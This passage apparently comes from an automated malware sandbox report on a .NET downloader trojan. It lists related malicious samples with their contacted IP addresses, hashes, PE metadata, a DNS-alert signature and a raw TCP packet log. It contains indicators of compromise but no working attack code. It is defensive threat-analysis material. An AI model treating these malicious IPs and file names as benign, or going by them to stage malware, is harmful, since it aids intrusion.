                                                                        p3pPK1Vc6A.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.99
                                                                        AGYBQdiv78.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.99
                                                                        yYzEgFDbKB.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.99
                                                                        Abt7jLpnDT.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.99
                                                                        JcMO54OCI5.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.99
                                                                        QDrpoPzP8c.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.99
                                                                        UNIFIEDLAYER-AS-1USInquiry Order Q330284.exeGet hashmaliciousBrowse
                                                                        • 162.144.73.161
                                                                        B1kefW3SOZGet hashmaliciousBrowse
                                                                        • 173.83.45.198
                                                                        Custom Release Form(E) AWB 825.pdf.exeGet hashmaliciousBrowse
                                                                        • 192.185.174.178
                                                                        aYlPjjl4yWGet hashmaliciousBrowse
                                                                        • 66.116.195.121
                                                                        Custom Release Form (E) AWB 825.pdf.exeGet hashmaliciousBrowse
                                                                        • 192.185.174.178
                                                                        STS5492338072022.xlsxGet hashmaliciousBrowse
                                                                        • 192.185.174.177
                                                                        SecuriteInfo.com.Trojan.MSIL.AgentTesla.MY.MTB.26387.exeGet hashmaliciousBrowse
                                                                        • 192.185.174.177
                                                                        SWIFT_5201660828948016.pdf.exeGet hashmaliciousBrowse
                                                                        • 192.185.174.177
                                                                        fake.htmlGet hashmaliciousBrowse
                                                                        • 69.49.246.164
                                                                        https://geni.us/SecureCaliberfileGet hashmaliciousBrowse
                                                                        • 192.185.28.38
                                                                        https://adclick.g.doubleclick.net/pcs/click?adurl=https://550418.secure.micomya.com/./outlook.office.com/mail/inbox/id/thall/op-f/77468616c6c406f702d662e6f7267#dGhhbGxAb3AtZi5vcmcGet hashmaliciousBrowse
                                                                        • 162.215.222.33
                                                                        Universalmiddel169.exeGet hashmaliciousBrowse
                                                                        • 173.254.30.236
                                                                        https://venkeywonder.com/gtrsfauvc/xwazutdrs/yxwaertfs/oglvjh0jkhjh/traciparker@smartcabinetry.comGet hashmaliciousBrowse
                                                                        • 192.185.181.244
                                                                        SWIFT_5201660828948056.pdf.exeGet hashmaliciousBrowse
                                                                        • 192.185.174.177
                                                                        Shipping Document.exeGet hashmaliciousBrowse
                                                                        • 192.185.16.184
                                                                        SWIFT_5201660828944056.pdf.exeGet hashmaliciousBrowse
                                                                        • 192.185.174.177
                                                                        S3Qh32tUFn.exeGet hashmaliciousBrowse
                                                                        • 108.167.136.41
                                                                        2iDHX35ycf.exeGet hashmaliciousBrowse
                                                                        • 50.87.139.143
                                                                        Statement of Account.exeGet hashmaliciousBrowse
                                                                        • 162.144.73.161
                                                                        New_OUTSTANDING _INVOIC.exeGet hashmaliciousBrowse
                                                                        • 50.87.144.250
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                        3b5074b1b5d032e5620f69f9f700ff0eDECLARATIE EXPORT UK1RO-0108DSV_0381.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        • 162.240.35.239
                                                                        OFFER NO. 007 DATE 04.08.2022 2435676.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        • 162.240.35.239
                                                                        request.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        • 162.240.35.239
                                                                        SecuriteInfo.com.Variant.Tedy.183368.2454.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        • 162.240.35.239
                                                                        SecuriteInfo.com.W32.AIDetectNet.01.4744.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        • 162.240.35.239
                                                                        SecuriteInfo.com.Variant.Bulz.937784.5501.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        • 162.240.35.239
                                                                        PO79330.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        • 162.240.35.239
                                                                        AA1878F26132481B357627A0EF684FF68763E6E315FCE.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        • 162.240.35.239
                                                                        j4SGb5BB2X.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        • 162.240.35.239
                                                                        rust-stealer-xss.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        • 162.240.35.239
                                                                        dEsUpmoJDb.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        • 162.240.35.239
                                                                        Document.pdf.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        • 162.240.35.239
                                                                        VPO - SP.9686 Flex rev 2 - BL65338.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        • 162.240.35.239
                                                                        filedata.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        • 162.240.35.239
                                                                        CB7D7FE72BDC9B5C0DA00A175AD4354037473B71F8A9F.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        • 162.240.35.239
                                                                        W6EwiWgNYe.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        • 162.240.35.239
                                                                        F0Zluo0VUe.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        • 162.240.35.239
                                                                        h6AIdp2hDX.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        • 162.240.35.239
                                                                        Required Purchase Order Ref 00172288.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        • 162.240.35.239
                                                                        bt3zwLS7t6.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        • 162.240.35.239
                                                                        No context
                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):847
                                                                        Entropy (8bit):5.35816127824051
                                                                        Encrypted:false
                                                                        SSDEEP:24:ML9E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7a:MxHKXwYHKhQnoPtHoxHhAHKzva
                                                                        MD5:31E089E21A2AEB18A2A23D3E61EB2167
                                                                        SHA1:E873A8FC023D1C6D767A0C752582E3C9FD67A8B0
                                                                        SHA-256:2DCCE5D76F242AF36DB3D670C006468BEEA4C58A6814B2684FE44D45E7A3F836
                                                                        SHA-512:A0DB65C3E133856C0A73990AEC30B1B037EA486B44E4A30657DD5775880FB9248D9E1CB533420299D0538882E9A883BA64F30F7263EB0DD62D1C673E7DBA881D
                                                                        Malicious:true
                                                                        Reputation:high, very likely benign file
                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..
                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Entropy (8bit):5.416536296760798
                                                                        TrID:
                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                        • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                        File name:SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe
                                                                        File size:246304
                                                                        MD5:36c6dddaa5fb7f14e221c8fa3bda0d92
                                                                        SHA1:11914d1b9eceea7365aa1195777193e8b7686bc9
                                                                        SHA256:fbeb5eff4ac0eaeeba51f60586ef6279f4c483c14803f293dbc513c8a032f60e
                                                                        SHA512:a66f4c78c609cf4c7d58d33bff7a106a9fb77a66c33cb7e420f8ee67c634c2752b43f72200d72f513629ba3df32191efea6400bd21a20a45b21fd201e154a931
                                                                        SSDEEP:1536:8UyE4Z7HDAZeLFuTOG/Hrqj71ZjhGIBOrPaOYdSkjiRNqOP3t2:ME4iUub/Hrq371hEbaFSkjiRrPd
                                                                        TLSH:3834BB74A1F12ACEE896CEB29E60E919FFE31C519A45820FD03235F6553BB85C6041FE
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b..............0.............N.... ... ....@.. .............................._h....`................................
                                                                        Icon Hash:90828c8c8c8a9010
                                                                        Entrypoint:0x41004e
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:true
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE
                                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x62F0C585 [Mon Aug 8 08:12:53 2022 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                        Signature Valid:false
                                                                        Signature Issuer:CN=DigiCert High Assurance Code Signing CA-1, OU=www.digicert.com, O=DigiCert Inc, C=US
                                                                        Signature Validation Error:The digital signature of the object did not verify
                                                                        Error Number:-2146869232
                                                                        Not Before, Not After
                                                                        • 10/30/2013 1:00:00 AM 1/4/2017 1:00:00 PM
                                                                        Subject Chain
                                                                        • CN=Wen Jia Liu, O=Wen Jia Liu, L=Sydney, S=New South Wales, C=AU
                                                                        Version:3
                                                                        Thumbprint MD5:FB7AAB26B203432685FBC0FF17F24045
                                                                        Thumbprint SHA-1:32387AEC09EB287F202E98398189B460F4C61A0D
                                                                        Thumbprint SHA-256:E0E85619EEF45FCE4421E4BA581060E43BBBF25911CD757DD081DA425DD1DB51
                                                                        Serial:0FF1EF66BD621C65B74B4DE41425717F
                                                                        Instruction
                                                                        jmp dword ptr [00402000h]
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xfffc0x4f.text
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x120000x2a0c4.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x388000x3a20
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x3e0000xc.reloc
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0xffb40x1c.text
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                        .text0x20000xe0540xe200False0.4872614767699115Targa image data - Map 2 x 5 x 28 +72 - 1-bit alpha - right - four way interleave ""5.972358130871814IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                        .rsrc0x120000x2a0c40x2a200False0.13789526149851633data4.499897463746581IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .reloc0x3e0000xc0x200False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                        NameRVASizeTypeLanguageCountry
                                                                        RT_ICON0x122c40x2270PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                        RT_ICON0x145340x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
                                                                        RT_ICON0x24d5c0x94a8data
                                                                        RT_ICON0x2e2040x5488data
                                                                        RT_ICON0x3368c0x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 4294967055
                                                                        RT_ICON0x378b40x25a8data
                                                                        RT_ICON0x39e5c0x10a8data
                                                                        RT_ICON0x3af040x988data
                                                                        RT_ICON0x3b88c0x468GLS_BINARY_LSB_FIRST
                                                                        RT_GROUP_ICON0x3bcf40x84data
                                                                        RT_VERSION0x3bd780x34cdata
                                                                        DLLImport
                                                                        mscoree.dll_CorExeMain
                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                        192.168.2.48.8.8.854800532012811 08/08/22-12:54:11.254271UDP2012811ET DNS Query to a .tk domain - Likely Hostile5480053192.168.2.48.8.8.8
                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Aug 8, 2022 12:54:11.637722969 CEST49751443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:11.637773991 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:11.637849092 CEST49751443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:11.661735058 CEST49751443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:11.661786079 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:12.173983097 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:12.174120903 CEST49751443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:12.192428112 CEST49751443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:12.192476988 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:12.192905903 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:12.238226891 CEST49751443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:12.654378891 CEST49751443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:12.695368052 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:12.823048115 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:12.823121071 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:12.823143959 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:12.823198080 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:12.823252916 CEST49751443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:12.823270082 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:12.823319912 CEST49751443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:12.989171982 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:12.989211082 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:12.989299059 CEST49751443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:12.989330053 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:12.989348888 CEST49751443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:12.989365101 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:12.989388943 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:12.989438057 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:12.989455938 CEST49751443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:12.989471912 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:12.989484072 CEST49751443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:12.989490986 CEST49751443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:12.989526987 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:12.989547968 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:12.989590883 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:12.989605904 CEST49751443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:12.989622116 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:12.989635944 CEST49751443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:12.989643097 CEST49751443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:13.050839901 CEST49751443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:13.155409098 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:13.155452013 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:13.155513048 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:13.155555010 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:13.155560970 CEST49751443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:13.155569077 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:13.155600071 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:13.155663967 CEST49751443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:13.155673981 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:13.155730009 CEST49751443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:13.155775070 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:13.155786991 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:13.155812979 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:13.155838966 CEST49751443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:13.155889988 CEST49751443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:13.156044006 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:13.156056881 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:13.156084061 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:13.156097889 CEST49751443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:13.156138897 CEST49751443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:13.156224966 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:13.156236887 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:13.156289101 CEST49751443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:13.156316042 CEST49751443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:13.156414986 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:13.156426907 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:13.156490088 CEST49751443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:13.156630039 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:13.156714916 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:13.156723976 CEST49751443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:13.156761885 CEST49751443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:13.323765993 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:13.323961973 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:13.323988914 CEST49751443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:13.324008942 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:13.324029922 CEST49751443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:13.324059010 CEST49751443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:13.324232101 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:13.324314117 CEST49751443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:13.324431896 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:13.324506044 CEST49751443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:13.324636936 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:13.324759960 CEST49751443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:13.324918985 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:13.324992895 CEST49751443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:13.325156927 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:13.325227976 CEST49751443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:13.325340033 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:13.325417995 CEST49751443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:13.325556040 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:13.325635910 CEST49751443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:13.495937109 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:13.496117115 CEST49751443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:13.496140003 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:13.496176004 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:13.496222973 CEST49751443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:13.496239901 CEST49751443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:13.496346951 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:13.496421099 CEST49751443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:13.496478081 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:13.496546984 CEST49751443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:13.661899090 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:13.661984921 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:13.662026882 CEST49751443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:13.662045956 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:13.662059069 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:13.662081003 CEST49751443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:13.662102938 CEST49751443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:13.662122011 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:13.662178993 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:13.662184000 CEST49751443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:13.662204981 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:13.662228107 CEST49751443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:13.662235975 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:13.662286997 CEST49751443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:13.662300110 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:13.662317038 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:13.662375927 CEST49751443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:13.662384987 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:13.662398100 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:13.662450075 CEST49751443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:13.662455082 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:13.662468910 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:13.662513018 CEST49751443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:13.662542105 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:13.662592888 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:13.662607908 CEST49751443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:13.662621975 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:13.662641048 CEST49751443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:13.662648916 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:13.662676096 CEST49751443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:13.662687063 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:13.662703037 CEST44349751162.240.35.239192.168.2.4
                                                                        Aug 8, 2022 12:54:13.662708998 CEST49751443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:13.662760973 CEST49751443192.168.2.4162.240.35.239
                                                                        Aug 8, 2022 12:54:13.662770987 CEST44349751162.240.35.239192.168.2.4
